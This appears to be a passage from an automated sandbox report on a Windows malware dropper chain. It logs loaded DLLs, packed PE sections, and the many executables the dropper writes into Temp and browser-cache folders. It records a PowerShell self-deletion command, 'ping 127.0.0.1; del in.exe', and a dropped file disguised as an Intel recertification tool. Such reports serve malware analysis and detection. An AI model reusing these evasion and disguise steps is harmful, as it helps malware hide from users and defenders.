                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: file.exeStatic file information: File size 3032576 > 1048576
                    Source: file.exeStatic PE information: Raw size of hjveylar is bigger than: 0x100000 < 0x2b2c00
                    Source: Binary string: Unhook.pdb source: RzAAR0y.exe, 0000000B.00000002.4692082681.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp, RzAAR0y.exe, 0000000B.00000000.2790737030.00007FF7026E1000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp
                    Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000009.00000002.4668807005.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3988275528.00000000015AA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: 2gwmtZs.exe, 2gwmtZs.exe, 0000000A.00000002.3328779880.00007FF60AA29000.00000040.00000001.01000000.00000009.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.e70000.0.unpack :EW;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 9.2.skotes.exe.470000.0.unpack :EW;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjveylar:EW;feaxxngf:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exeUnpacked PE file: 10.2.2gwmtZs.exe.7ff60a9e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;omdapsrn:EW;ehlcdwxw:EW;.pdata:R;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;omdapsrn:EW;ehlcdwxw:EW;.pdata:R;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeUnpacked PE file: 52.2.950932ab59.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzigcvvj:EW;pdsqmwos:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzigcvvj:EW;pdsqmwos:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                    Source: random[2].exe1.9.drStatic PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: random[2].exe0.9.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                    Source: 224de4e34e.exe.9.drStatic PE information: real checksum: 0x1d0d19 should be: 0x1d759f
                    Source: b93717638f.exe.9.drStatic PE information: real checksum: 0x44792d should be: 0x43f371
                    Source: 003.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x2ed9d8
                    Source: random[4].exe.9.drStatic PE information: real checksum: 0x2ba72a should be: 0x2c0344
                    Source: 22b355416f.exe.9.drStatic PE information: real checksum: 0x2ba72a should be: 0x2c0344
                    Source: 92133eb3c2.exe.9.drStatic PE information: real checksum: 0x1e3188 should be: 0x1dd217
                    Source: random[2].exe1.9.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                    Source: random[3].exe0.9.drStatic PE information: real checksum: 0x1d0d19 should be: 0x1d759f
                    Source: random[2].exe.9.drStatic PE information: real checksum: 0x1a555c should be: 0x15e8ab
                    Source: 003[1].exe.9.drStatic PE information: real checksum: 0x0 should be: 0x2ed9d8
                    Source: 2002c77d6d.exe.9.drStatic PE information: real checksum: 0x2b36ea should be: 0x2abb42
                    Source: 22b0b7688f.exe.9.drStatic PE information: real checksum: 0x43f82e should be: 0x44cc74
                    Source: random[1].exe.9.drStatic PE information: real checksum: 0x43f82e should be: 0x44cc74
                    Source: 950932ab59.exe.9.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                    Source: random[4].exe0.9.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                    Source: ca733a156b.exe.9.drStatic PE information: real checksum: 0x0 should be: 0xc8597
                    Source: 08b7ae794c.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x14b59
                    Source: random[1].exe0.9.drStatic PE information: real checksum: 0x1cfc32 should be: 0x1d33c1
                    Source: random[3].exe.9.drStatic PE information: real checksum: 0x44792d should be: 0x43f371
                    Source: random[2].exe2.9.drStatic PE information: real checksum: 0x1e3188 should be: 0x1dd217
                    Source: file.exeStatic PE information: real checksum: 0x2edeae should be: 0x2eae58
                    Source: random[3].exe1.9.drStatic PE information: real checksum: 0x2b36ea should be: 0x2abb42
                    Source: skotes.exe.1.drStatic PE information: real checksum: 0x2edeae should be: 0x2eae58
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name: hjveylar
                    Source: file.exeStatic PE information: section name: feaxxngf
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: skotes.exe.1.drStatic PE information: section name:
                    Source: skotes.exe.1.drStatic PE information: section name: .idata
                    Source: skotes.exe.1.drStatic PE information: section name: hjveylar
                    Source: skotes.exe.1.drStatic PE information: section name: feaxxngf
                    Source: skotes.exe.1.drStatic PE information: section name: .taggant
                    Source: random[1].exe.9.drStatic PE information: section name:
                    Source: random[1].exe.9.drStatic PE information: section name: .idata
                    Source: random[1].exe.9.drStatic PE information: section name:
                    Source: random[1].exe.9.drStatic PE information: section name: hkbprtow
                    Source: random[1].exe.9.drStatic PE information: section name: nzqpevfi
                    Source: random[1].exe.9.drStatic PE information: section name: .taggant
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name:
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name: .idata
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name:
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name: hkbprtow
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name: nzqpevfi
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name: .taggant
                    Source: random[2].exe.9.drStatic PE information: section name: .eh_fram
                    Source: random[1].exe0.9.drStatic PE information: section name:
                    Source: random[1].exe0.9.drStatic PE information: section name: .idata
                    Source: random[1].exe0.9.drStatic PE information: section name:
                    Source: random[1].exe0.9.drStatic PE information: section name: lzigcvvj
                    Source: random[1].exe0.9.drStatic PE information: section name: pdsqmwos
                    Source: random[1].exe0.9.drStatic PE information: section name: .taggant
                    Source: 950932ab59.exe.9.drStatic PE information: section name:
                    Source: 950932ab59.exe.9.drStatic PE information: section name: .idata
                    Source: 950932ab59.exe.9.drStatic PE information: section name:
                    Source: 950932ab59.exe.9.drStatic PE information: section name: lzigcvvj
                    Source: 950932ab59.exe.9.drStatic PE information: section name: pdsqmwos
                    Source: 950932ab59.exe.9.drStatic PE information: section name: .taggant
                    Source: random[3].exe.9.drStatic PE information: section name:
                    Source: random[3].exe.9.drStatic PE information: section name: .idata
                    Source: random[3].exe.9.drStatic PE information: section name:
                    Source: random[3].exe.9.drStatic PE information: section name: lvbdatvl
                    Source: random[3].exe.9.drStatic PE information: section name: bclfnnmn
                    Source: random[3].exe.9.drStatic PE information: section name: .taggant
                    Source: b93717638f.exe.9.drStatic PE information: section name:
                    Source: b93717638f.exe.9.drStatic PE information: section name: .idata
                    Source: b93717638f.exe.9.drStatic PE information: section name:
                    Source: b93717638f.exe.9.drStatic PE information: section name: lvbdatvl
                    Source: b93717638f.exe.9.drStatic PE information: section name: bclfnnmn
                    Source: b93717638f.exe.9.drStatic PE information: section name: .taggant
                    Source: random[2].exe2.9.drStatic PE information: section name:
                    Source: random[2].exe2.9.drStatic PE information: section name: .idata
                    Source: random[2].exe2.9.drStatic PE information: section name:
                    Source: random[2].exe2.9.drStatic PE information: section name: gptxkuce
                    Source: random[2].exe2.9.drStatic PE information: section name: tnohnhsw
                    Source: random[2].exe2.9.drStatic PE information: section name: .taggant
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name:
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name: .idata
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name:
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name: gptxkuce
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name: tnohnhsw
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name: .taggant
                    Source: random[3].exe0.9.drStatic PE information: section name:
                    Source: random[3].exe0.9.drStatic PE information: section name: .idata
                    Source: random[3].exe0.9.drStatic PE information: section name:
                    Source: random[3].exe0.9.drStatic PE information: section name: gghkcrho
                    Source: random[3].exe0.9.drStatic PE information: section name: phbqiwyh
                    Source: random[3].exe0.9.drStatic PE information: section name: .taggant
                    Source: 224de4e34e.exe.9.drStatic PE information: section name:
                    Source: 224de4e34e.exe.9.drStatic PE information: section name: .idata
                    Source: 224de4e34e.exe.9.drStatic PE information: section name:
                    Source: 224de4e34e.exe.9.drStatic PE information: section name: gghkcrho
                    Source: 224de4e34e.exe.9.drStatic PE information: section name: phbqiwyh
                    Source: 224de4e34e.exe.9.drStatic PE information: section name: .taggant
                    Source: random[4].exe.9.drStatic PE information: section name:
                    Source: random[4].exe.9.drStatic PE information: section name: .idata
                    Source: random[4].exe.9.drStatic PE information: section name: ahfdhchk
                    Source: random[4].exe.9.drStatic PE information: section name: qmoqclyl
                    Source: random[4].exe.9.drStatic PE information: section name: .taggant
                    Source: 22b355416f.exe.9.drStatic PE information: section name:
                    Source: 22b355416f.exe.9.drStatic PE information: section name: .idata
                    Source: 22b355416f.exe.9.drStatic PE information: section name: ahfdhchk
                    Source: 22b355416f.exe.9.drStatic PE information: section name: qmoqclyl
                    Source: 22b355416f.exe.9.drStatic PE information: section name: .taggant
                    Source: random[3].exe1.9.drStatic PE information: section name:
                    Source: random[3].exe1.9.drStatic PE information: section name: .idata
                    Source: random[3].exe1.9.drStatic PE information: section name: tniryivd
                    Source: random[3].exe1.9.drStatic PE information: section name: nnokcvcq
                    Source: random[3].exe1.9.drStatic PE information: section name: .taggant
                    Source: 2002c77d6d.exe.9.drStatic PE information: section name:
                    Source: 2002c77d6d.exe.9.drStatic PE information: section name: .idata
                    Source: 2002c77d6d.exe.9.drStatic PE information: section name: tniryivd
                    Source: 2002c77d6d.exe.9.drStatic PE information: section name: nnokcvcq
                    Source: 2002c77d6d.exe.9.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E8D91C push ecx; ret 1_2_00E8D92F
                    Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E81359 push es; ret 1_2_00E8135A
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0048D91C push ecx; ret 2_2_0048D92F
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0047BA83 push ss; retf 2_2_0047BA84
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0048D91C push ecx; ret 9_2_0048D92F
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 9_2_0048DFC6 push ecx; ret 9_2_0048DFD9
                    Source: file.exeStatic PE information: section name: entropy: 7.979751074581925
                    Source: skotes.exe.1.drStatic PE information: section name: entropy: 7.979751074581925
                    Source: random[1].exe.9.drStatic PE information: section name: hkbprtow entropy: 7.956209128486929
                    Source: 22b0b7688f.exe.9.drStatic PE information: section name: hkbprtow entropy: 7.956209128486929
                    Source: random[1].exe0.9.drStatic PE information: section name: entropy: 7.979706188474013
                    Source: random[1].exe0.9.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                    Source: 950932ab59.exe.9.drStatic PE information: section name: entropy: 7.979706188474013
                    Source: 950932ab59.exe.9.drStatic PE information: section name: lzigcvvj entropy: 7.9541420583885305
                    Source: random[3].exe.9.drStatic PE information: section name: lvbdatvl entropy: 7.9540838527717685
                    Source: b93717638f.exe.9.drStatic PE information: section name: lvbdatvl entropy: 7.9540838527717685
                    Source: random[2].exe2.9.drStatic PE information: section name: gptxkuce entropy: 7.947458319333243
                    Source: 92133eb3c2.exe.9.drStatic PE information: section name: gptxkuce entropy: 7.947458319333243
                    Source: random[3].exe0.9.drStatic PE information: section name: entropy: 7.983064571783079
                    Source: random[3].exe0.9.drStatic PE information: section name: gghkcrho entropy: 7.954187701530939
                    Source: 224de4e34e.exe.9.drStatic PE information: section name: entropy: 7.983064571783079
                    Source: 224de4e34e.exe.9.drStatic PE information: section name: gghkcrho entropy: 7.954187701530939
                    Source: random[4].exe0.9.drStatic PE information: section name: .text entropy: 7.73440914387992

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\245347\Dry.comJump to dropped file
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: attrib.exe
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018903001\08b7ae794c.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[3].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\245347\Dry.comJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018911001\36d93f3c0c.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018904001\b93717638f.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018906001\003.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\RzAAR0y[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018909001\d44a5c682a.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018902001\ca733a156b.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[5].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018908001\22b355416f.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018907001\224de4e34e.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[3].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[4].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1018910001\2002c77d6d.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
